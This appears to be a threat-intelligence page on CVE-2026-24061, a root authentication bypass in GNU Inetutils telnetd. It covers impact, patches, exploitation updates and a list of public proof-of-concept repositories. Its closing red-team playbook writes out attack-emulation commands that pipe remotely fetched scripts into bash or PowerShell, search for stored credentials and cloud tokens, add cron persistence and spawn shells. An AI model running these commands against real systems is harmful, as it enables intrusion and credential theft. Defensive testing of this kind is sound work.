CVE-2026-24061
Overview
This vulnerability is an authentication bypass affecting the telnetd daemon in GNU Inetutils versions up to 2.7. The root cause lies in improper handling of the USER environment variable, where providing a "-f root" value bypasses normal authentication checks. The flaw resides specifically in the telnetd component's user authentication mechanism, allowing unauthorized access without credential verification.
Vulnerability Description
telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.
Impact
An unauthenticated remote attacker can gain root-level access to the affected system by exploiting this vulnerability. No credentials or user interaction are required, enabling full system compromise. This access allows execution of arbitrary commands with administrative privileges, potentially leading to data theft, system manipulation, or lateral movement within a network environment, severely compromising confidentiality, integrity, and availability of the system.
Solution
Users should upgrade GNU Inetutils to a version later than 2.7 where this vulnerability is addressed. The GNU Inetutils project provides patches and updated releases on their official site (https://www.gnu.org/software/inetutils/). Debian users are advised to apply security updates provided in Debian Linux 11.0 or later. Detailed patch instructions and advisories are available through the referenced Openwall security mailing list posts dated 2026-01-20.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the telnet daemon of GNU Inetutils presents a significant security risk due to its ability to allow remote authentication bypass. This flaw arises from the improper handling of the USER environment variable when it is set to a specific value, namely "-f root." When this value is utilized, the telnet daemon fails to enforce proper authentication checks, effectively granting unauthorized access to the root account. This oversight in the authentication mechanism can lead to severe consequences, as it undermines the fundamental security principles of user verification and access control.
Attack vectors exploiting this vulnerability are straightforward yet highly effective. An attacker with network access could craft a malicious telnet request that includes the aforementioned USER environment variable modification. By doing so, they could bypass the authentication process entirely and gain root-level access to the affected system. This scenario is particularly concerning in environments where telnet is still in use, as it is inherently insecure and transmits data, including credentials, in plaintext. The simplicity of this attack vector makes it accessible even to less sophisticated adversaries, increasing the likelihood of exploitation in vulnerable systems.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely on GNU Inetutils for network services. Gaining root access allows an attacker to manipulate system files, install malicious software, or exfiltrate sensitive data, leading to potential data breaches and operational disruptions. The business risks associated with such incidents include financial losses, reputational damage, and regulatory penalties, especially if sensitive customer information is compromised. Furthermore, the ease of exploitation means that organizations may face increased scrutiny from stakeholders and customers, leading to a loss of trust and confidence in their security posture.
To detect and mitigate this vulnerability, organizations should first ensure that they are not using vulnerable versions of GNU Inetutils. Regularly updating software to the latest stable releases is crucial in maintaining a secure environment. Additionally, organizations should consider disabling telnet in favor of more secure alternatives, such as SSH, which provides encrypted communication and stronger authentication mechanisms. Implementing network segmentation and access controls can further reduce the attack surface by limiting exposure to services that are not necessary for business operations. Monitoring network traffic for unusual patterns or unauthorized access attempts can also aid in early detection of exploitation attempts.
In conclusion, the vulnerability in the telnet daemon of GNU Inetutils represents a critical security concern that can lead to unauthorized access and significant operational risks. Organizations must prioritize the identification and remediation of this issue through software updates, the adoption of secure communication protocols, and robust monitoring practices. By taking proactive measures, businesses can safeguard their systems against potential exploitation and maintain the integrity of their operations in an increasingly hostile cyber landscape.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-24061, reflected by a moderate increase in detection events across our sensors. This uptick coincides with the emergence of several new proof-of-concept exploit tools, broadening the accessibility of this critical authentication bypass vulnerability to a wider attacker base. The slight rise in the EPSS score further underscores the growing likelihood of exploitation attempts in operational environments. These developments heighten the urgency for defenders, as the expanded exploit landscape lowers the barrier for adversaries to conduct unauthorized access via the vulnerable GNU Inetutils telnet daemon. Consequently, the threat level associated with this vulnerability has intensified, signaling an elevated risk of compromise that demands heightened vigilance in monitoring and threat detection efforts.
Update 2 — May 15, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-24061, evidenced by a slight increase in detection trends across our sensors. More critically, the emergence of a publicly accessible ExploitDB entry has broadened the exploit landscape, lowering the technical barrier for adversaries to weaponize this vulnerability. This development coincides with a modest uptick in the EPSS score, signaling a growing probability of successful exploitation attempts in operational environments. The proliferation of new proof-of-concept exploits, including several user-friendly tools, further amplifies the risk by enabling a wider range of threat actors to conduct remote authentication bypass attacks against vulnerable GNU Inetutils telnetd instances. Collectively, these factors elevate the threat level associated with CVE-2026-24061, underscoring the need for heightened monitoring and proactive threat detection to mitigate potential unauthorized access and system compromise.
Update 3 — June 07, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2026-24061, accompanied by the emergence of additional user-friendly proof-of-concept tools that lower the technical barrier for attackers. This subtle rise in activity, coupled with the availability of new exploitation resources, broadens the adversary landscape by enabling less sophisticated threat actors to attempt remote authentication bypasses against vulnerable GNU Inetutils telnetd services. Our telemetry indicates that while the overall exploitation volume remains moderate, the incremental growth in both detection frequency and exploit accessibility elevates the likelihood of successful intrusions in operational environments. Consequently, the threat level associated with this vulnerability has shifted upward, reflecting a heightened risk of unauthorized access and potential system compromise, particularly in environments where patching is delayed or incomplete.
Update 4 — June 19, 2026
CSURFACE threat intelligence has detected a slight increase in activity exploiting CVE-2026-24061, accompanied by the emergence of new proof-of-concept tools that have broadened the exploit landscape. This development is reflected in the elevated Exploit Prediction Scoring System (EPSS) score, which has risen notably, indicating a growing likelihood of exploitation attempts in the near term. Although the overall volume of attacks remains moderate, the availability of diverse exploitation resources lowers the barrier for threat actors, potentially accelerating the pace of unauthorized access attempts against vulnerable GNU Inetutils telnetd services. This shift underscores an increased operational risk, particularly for environments where patching is not promptly applied, and suggests that defenders should anticipate more frequent probing and targeted intrusion efforts leveraging this vulnerability.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gnu | Inetutils | All |
cpe:2.3:a:gnu:inetutils:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 11.0 |
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061
exploits/linux/telnet/gnu_inetutils_auth_bypass
|
jheysel-r7, Kyu Neushwaistein | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation | aliguliyev | local | linux | - | View |
GitHub PoCs (73)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
SafeBreach-Labs/CVE-2026-24061
Exploitation of CVE-2026-24061
|
SafeBreach-Labs | 204 | 45 | 2026-01-22 | View |
|
JayGLXR/CVE-2026-24061-POC
|
JayGLXR | 66 | 11 | 2026-01-22 | View |
|
parameciumzhang/Tell-Me-Root
基于cve-2026-24061 telnet远程认证绕过漏洞的批量检测利用工具
|
parameciumzhang | 20 | 4 | 2026-01-22 | View |
|
ekomsSavior/telnet_scan
scanner/exploiter CVE-2026-24061 & CVE-2026-32746
|
ekomsSavior | 10 | 6 | 2026-03-26 | View |
|
Lingzesec/CVE-2026-24061-GUI
CVE-2026-24061 GNU Inetutils telnetd 身份验证绕过漏洞检测与利用 GUI 工具
|
Lingzesec | 15 | 1 | 2026-01-26 | View |
|
Chocapikk/CVE-2026-24061
|
Chocapikk | 10 | 3 | 2026-01-22 | View |
|
TryA9ain/CVE-2026-24061
CVE-2026-24061 Batch Scanning Tool
|
TryA9ain | 8 | 4 | 2026-01-22 | View |
|
leonjza/inetutils-telnetd-auth-bypass
A small docker lab to play with cve-2026-24061, the inetutils-telnetd authentication bypass.
|
leonjza | 9 | 0 | 2026-01-21 | View |
|
0p5cur/CVE-2026-24061-POC
CVE-2026-24061's poc : a critical authentication bypass in telnetd leading to RCE as root Affects systems with telnetd v...
|
0p5cur | 5 | 4 | 2026-01-24 | View |
|
h3athen/CVE-2026-24061
CVE-2026-24061 - Exploit
|
h3athen | 7 | 1 | 2026-01-22 | View |
|
jacubes/CVE-2026-24061
CVE-2026-24061 exploit PoC
|
jacubes | 6 | 1 | 2026-03-08 | View |
|
sh4den/CVE-2026-24061
Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing una...
|
sh4den | 5 | 1 | 2026-01-23 | View |
|
SystemVll/CVE-2026-24061
Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing una...
|
SystemVll | 5 | 1 | 2026-01-23 | View |
|
tc4dy/CVE-2026-24061-PoC-Exploit
🚀 CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass Exploit - Full Control 💥 CRLF injection via NEW_ENVIRON leads to au...
|
tc4dy | 5 | 0 | 2026-06-06 | View |
|
ibrahmsql/CVE-2026-24061-PoC
CVE-2026-24061 PoC and walkthrough
|
ibrahmsql | 4 | 0 | 2026-02-02 | View |
|
madfxr/Twenty-Three-Scanner
CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass
|
madfxr | 4 | 0 | 2026-01-24 | View |
|
shivam-bathla/CVE-2026-24061-setup
Docker setup for CVE-2026-24061
|
shivam-bathla | 3 | 1 | 2026-01-24 | View |
|
xuemian168/CVE-2026-24061
|
xuemian168 | 3 | 0 | 2026-01-23 | View |
|
duy-31/CVE-2026-24061---telnetd
Bypass d’authentification Telnet menant à un accès root
|
duy-31 | 2 | 1 | 2026-01-22 | View |
|
RStephanH/vuln-deb
A vulnerable Debian-based VM for practising exploitation of CVE-2026-24061
|
RStephanH | 2 | 0 | 2026-04-13 | View |
|
MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
GNU Inetutils telnet远程认证绕过漏洞(CVE-2026-24061),该漏洞源于 GNU Inetutils telnetd 组件中对环境变量处理不当,攻击者可利用该漏洞,通过构造恶意的 USER 环境变量并发送至受影响...
|
MY0723 | 1 | 1 | 2026-01-28 | View |
|
dotelpenguin/telnetd_CVE-2026-24061_tester
Checks for CVE-2026-24061 Telnetd exploit
|
dotelpenguin | 1 | 1 | 2026-01-28 | View |
|
balgan/CVE-2026-24061
inetutils-telnetd Authentication Bypass - working
|
balgan | 2 | 0 | 2026-01-23 | View |
|
yanxinwu946/CVE-2026-24061--telnetd
GNU InetUtils telnetd 远程身份认证绕过漏洞(CVE-2026-24061),此漏洞主要影响 telnetd 在调用系统 /usr/bin/login 程序时,未对从客户端 USER 环境变量传入的用户名做过滤,直接拼接...
|
yanxinwu946 | 2 | 0 | 2026-01-22 | View |
|
K3ysTr0K3R/CVE-2026-24061
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
|
K3ysTr0K3R | 1 | 0 | 2026-06-08 | View |
|
X-croot/CVE-2026-24061_POC
POC Script for CVE-2026-24061 (GNU Telnetd Exploit)
|
X-croot | 1 | 0 | 2026-02-01 | View |
|
setuju/telnetd
Idk what to do here, ill edit soon, but its for the telnetd CVE-2026-24061
|
setuju | 1 | 0 | 2026-03-03 | View |
|
Mr-Zapi/CVE-2026-24061
Nuclei template for CVE-2026-24061
|
Mr-Zapi | 0 | 1 | 2026-01-24 | View |
|
Mefhika120/Ashwesker-CVE-2026-24061
CVE-2026-24061
|
Mefhika120 | 0 | 1 | 2026-01-25 | View |
|
androidteacher/CVE-2026-24061-PoC-Telnetd
|
androidteacher | 0 | 1 | 2026-01-27 | View |
|
infat0x/CVE-2026-24061
CVE-2026-24061 PoC
|
infat0x | 1 | 0 | 2026-01-25 | View |
|
0xBlackash/CVE-2026-24061
CVE-2026-24061
|
0xBlackash | 1 | 0 | 2026-03-09 | View |
|
FurkanKAYAPINAR/CVE-2026-24061-telnet2root
|
FurkanKAYAPINAR | 1 | 0 | 2026-01-27 | View |
|
harygovind/CVE-2026-24061
CVE-2026-24061-PoC
|
harygovind | 0 | 0 | 2026-07-06 | View |
|
kyukazamiqq/CVE-2026-24061
|
kyukazamiqq | 0 | 0 | 2026-06-27 | View |
|
Cosm3No1de/htb-orion-writeup
Hack The Box - Orion (Easy) | CVE-2025-32432 & CVE-2026-24061
|
Cosm3No1de | 0 | 0 | 2026-06-27 | View |
|
anxs3c/CVE-2026-24061-GNU-InetUtils-telnetd
GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability
|
anxs3c | 0 | 0 | 2026-06-08 | View |
|
akpmarcelin/CVE-2026-24061-lab
|
akpmarcelin | 0 | 0 | 2026-06-17 | View |
|
achnouri/CVE-2026-24061-GNU-InetUtils-telnetd
GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability
|
achnouri | 0 | 0 | 2026-06-08 | View |
|
ahmadsadeeq/TelnetdBypass-
CVE-2026-24061 — GNU InetUtils Telnetd Authentication Bypass Scanner
|
ahmadsadeeq | 0 | 0 | 2026-06-01 | View |
|
monstertsl/CVE-2026-24061
CVE-2026-24061 漏洞检测工具
|
monstertsl | 0 | 0 | 2026-01-23 | View |
|
BrainBob/CVE-2026-24061
|
BrainBob | 0 | 0 | 2026-01-24 | View |
|
BrainBob/Telnet-TestVuln-CVE-2026-24061
|
BrainBob | 0 | 0 | 2026-01-24 | View |
|
Alter-N0X/CVE-2026-24061-POC
CVE-2026-24061 - GNU InetUtils telnetd authentication bypass POC + Docker lab environment for testing
|
Alter-N0X | 0 | 0 | 2026-01-24 | View |
|
typeconfused/CVE-2026-24061
GNU telnetd service from GNU InetUtils authentication-bypass
|
typeconfused | 0 | 0 | 2026-01-25 | View |
|
ms0x08-dev/CVE-2026-24061-POC
|
ms0x08-dev | 0 | 0 | 2026-01-25 | View |
|
LucasPDiniz/CVE-2026-24061
Vulnerability in GNU InetUtils telnetd Enables Remote Root Access
|
LucasPDiniz | 0 | 0 | 2026-01-26 | View |
|
cumakurt/tscan
Telnetd Auth Bypass Scanner (CVE-2026-24061) A Python-based scanner for detecting and exploiting the CVE-2026-24061 vul...
|
cumakurt | 0 | 0 | 2026-01-27 | View |
|
novitahk/Exploit-CVE-2026-24061
Payload CVE-2026-24061
|
novitahk | 0 | 0 | 2026-01-27 | View |
|
Gabs-hub/CVE-2026-24061_Lab
Lab to show the CVE-2026-24061
|
Gabs-hub | 0 | 0 | 2026-01-28 | View |
|
0x7556/CVE-2026-24061
CVE-2026-24061 Telnet RCE Exploit For Linux MacOS Windows
|
0x7556 | 0 | 0 | 2026-01-28 | View |
|
Parad0x7e/CVE-2026-24061
|
Parad0x7e | 0 | 0 | 2026-01-28 | View |
|
0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061
This is a simple PoC that allows you to highlight the severity of the ongoing and actively exploited Telnet bug that is ...
|
0xXyc | 0 | 0 | 2026-01-31 | View |
|
buzz075/CVE-2026-24061
Scanner for CVE-2026-24061
|
buzz075 | 0 | 0 | 2026-01-31 | View |
|
lavabyte/telnet-CVE-2026-24061
|
lavabyte | 0 | 0 | 2026-02-04 | View |
|
canpilayda/inetutils-telnetd-cve-2026-24061
|
canpilayda | 0 | 0 | 2026-02-04 | View |
|
nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector
A passive detection tool for identifying potential exposure to CVE-2026-24061 in GNU inetutils telnet installations
|
nrnw | 0 | 0 | 2026-02-06 | View |
|
scumfrog/cve-2026-24061
CVE-2026-24061 PoC
|
scumfrog | 0 | 0 | 2026-02-06 | View |
|
tiborscholtz/CVE-2026-24061
A lightweight Docker lab for experimenting with Telnet protocol negotiation, explained in the CVE-2026-24061 exploit, wh...
|
tiborscholtz | 0 | 0 | 2026-02-14 | View |
|
mbanyamer/CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-
|
mbanyamer | 0 | 0 | 2026-02-18 | View |
|
Remnant-DB/CVE-2026-24061
CVE-2026-24061 Lab
|
Remnant-DB | 0 | 0 | 2026-03-03 | View |
|
HD0x01/CVE-2026-24061-NSE
The script performs a full Telnet negotiation mirroring the exact byte sequence of a real telnet -a client session.
|
HD0x01 | 0 | 0 | 2026-03-16 | View |
|
przemytn/CVE-2026-24061
CVE-2026-24061 PoC - telnetd auth bypass
|
przemytn | 0 | 0 | 2026-03-18 | View |
|
Risma2025/CVE-2026-24061-GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability
|
Risma2025 | 0 | 0 | 2026-04-05 | View |
|
killsystema/scan-cve-2026-24061
|
killsystema | 0 | 0 | 2026-02-05 | View |
|
SeptembersEND/CVE--2026-24061
A docker image for CVE-2026-24061 in InetUtils telnetd.
|
SeptembersEND | 0 | 0 | 2026-02-02 | View |
|
r00tuser111/CVE-2026-24061
CVE-2026-24061 环境
|
r00tuser111 | 0 | 0 | 2026-01-23 | View |
|
punitdarji/telnetd-cve-2026-24061
|
punitdarji | 0 | 0 | 2026-01-26 | View |
|
XsanFlip/CVE-2026-24061-Scanner
CVE-2026-24061-Scanner by XsanLahci
|
XsanFlip | 0 | 0 | 2026-01-26 | View |
|
midox008/CVE-2026-24061
GNU Inetutils telnetd Remote Authentication Bypass
|
midox008 | 0 | 0 | 2026-01-24 | View |
|
athack-ctf/chall2026-telneted
[AtHack 2026] Pwn challenge about telnetd CVE-2026-24061
|
athack-ctf | 0 | 0 | 2026-02-15 | View |
|
obrunolima1910/CVE-2026-24061
🚨 Exploit CVE-2026-24061, a critical remote authentication bypass in GNU inetutils-telnetd, for instant root shell acces...
|
obrunolima1910 | 0 | 0 | 2026-02-03 | View |
|
z3n70/CVE-2026-24061
|
z3n70 | 0 | 0 | 2026-01-24 | View |
Threat Feed
23 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.